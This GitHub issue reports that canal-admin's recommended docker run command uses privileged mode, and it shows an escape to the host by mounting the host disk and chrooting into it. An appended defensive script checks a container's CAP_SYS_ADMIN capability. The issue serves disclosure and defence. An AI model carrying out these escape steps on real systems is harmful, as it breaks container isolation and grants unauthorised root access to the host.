Closed
Description
- [x] I have searched the issues of this repository and believe that this is not a duplicate.
- [x] I have checked the FAQ of this repository and believe that this is not a duplicate.
Environment
- canal/canal-admin 1.1.8
- mysql version
Issue Description
docker run -d --privileged=true -it -h 192.168.88.42 -e server.port=8089 -e canal.adminUser=admin -e canal.adminPasswd=admin --name=canal-admin -p 8089:8089 -m 1024m canal/canal-admin
Starting the container this way uses privileged mode, which makes it possible to escape directly to the host.
Steps to reproduce
[root@192 admin]# mkdir /tmp/mnt
[root@192 admin]# fdisk -l
Disk /dev/sda: 32.2 GB, 32212254720 bytes, 62914560 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x000a1816
Device Boot Start End Blocks Id System
/dev/sda1 * 2048 62914526 31456239+ 83 Linux
[root@192 admin]# mount /dev/sda1 /tmp/mnt
[root@192 admin]# cd /tmp/mnt
[root@192 mnt]# chroot ./ bash
[root@192 /]# ls
bin boot data dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var
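A defender-side check for the condition this issue reports, as an added example that is not part of the original issue or the canal project: it reads the effective capability mask (`CapEff`) from `/proc/<pid>/status` text and reports whether CAP_SYS_ADMIN, which the `mount` step above depends on, is present. The function names and verdict strings are hypothetical, and the two status snippets are constructed samples.

```shell
#!/bin/sh
# Added example: classify a process by whether its effective capability
# mask contains CAP_SYS_ADMIN (required by mount(2)).

CAP_SYS_ADMIN_BIT=21   # bit number from linux/capability.h

# Print the CapEff hex mask from /proc/<pid>/status text read on stdin.
capeff_from_status() {
    awk '$1 == "CapEff:" { print $2; exit }'
}

# Exit 0 if capability bit $2 is set in hex mask $1.
has_cap() {
    [ $(( 0x$1 >> $2 & 1 )) -eq 1 ]
}

# Print a verdict for a CapEff hex mask; reject anything that is not hex.
classify_capeff() {
    case "$1" in
        ''|*[!0-9a-fA-F]*) echo "invalid"; return 2 ;;
    esac
    if has_cap "$1" "$CAP_SYS_ADMIN_BIT"; then
        echo "sys_admin"
    else
        echo "no_sys_admin"
    fi
}

# Constructed samples: a full mask as seen with --privileged (the exact
# value depends on the kernel version) and Docker's default capability set.
PRIVILEGED_STATUS='Name:   bash
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff'
DEFAULT_STATUS='Name:   bash
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb'

for s in "$PRIVILEGED_STATUS" "$DEFAULT_STATUS"; do
    mask=$(printf '%s\n' "$s" | capeff_from_status)
    echo "$mask -> $(classify_capeff "$mask")"
done
```

Inside a running container the same functions can be fed `/proc/1/status`; on the host, `docker inspect --format '{{.HostConfig.Privileged}}' canal-admin` reports the flag itself. A `sys_admin` verdict also appears when only that capability was added, so treat it as a signal to review the run options, not as proof of `--privileged`.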